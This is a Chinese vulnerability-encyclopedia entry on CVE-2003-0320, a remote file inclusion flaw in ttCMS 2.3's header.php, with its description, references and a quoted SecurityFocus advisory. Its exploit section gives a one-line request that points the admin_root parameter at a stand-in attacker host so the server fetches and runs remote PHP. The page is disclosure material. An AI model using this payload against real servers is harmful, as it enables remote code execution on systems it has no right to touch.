ttCMS header.php 注入任意PHP代码-安全小百科

ttCMS header.php 注入任意PHP代码

漏洞ID	1107331	漏洞类型	未知
发布时间	2003-05-17	更新时间	2003-06-09
CVE编号	CVE-2003-0320	CNNVD-ID	CNNVD-200306-016
漏洞平台	PHP	CVSS评分	7.5

|漏洞来源

https://www.exploit-db.com/exploits/22612
https://www.securityfocus.com/bid/87144
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200306-016

|漏洞详情

ttCMS2.3及其早期版本中的header.php存在漏洞。远程攻击者可以通过设置ttcms_user_admin参数为“1”和修改admin_root参数指向包含特洛伊木马header.inc.php脚本的URL注入任意PHP代码。

|漏洞EXP

source: http://www.securityfocus.com/bid/7625/info

A remote file include vulnerability has been reported for ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'header.php' script, it is possible for a remote attacker to include a malicious PHP file in a URL. 

http://target/admin/templates/header.php?admin_root=http://attacker/

|受影响的产品

Andy Prevost Ttcms 2.3

|参考资料

来源:BUGTRAQ
名称:20030517RemotecodeexecutioninttCMS<=v2.3
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105320172212990&w;=2

相关推荐: GlimpseHTTP and WebGlimpse Piped Command Vulnerability

GlimpseHTTP and WebGlimpse Piped Command Vulnerability 漏洞ID 1105155 漏洞类型 Input Validation Error 发布时间 1996-07-03 更新时间 1996-07-03 CV…

文章版权归作者所有，未经允许请勿转载。

THE END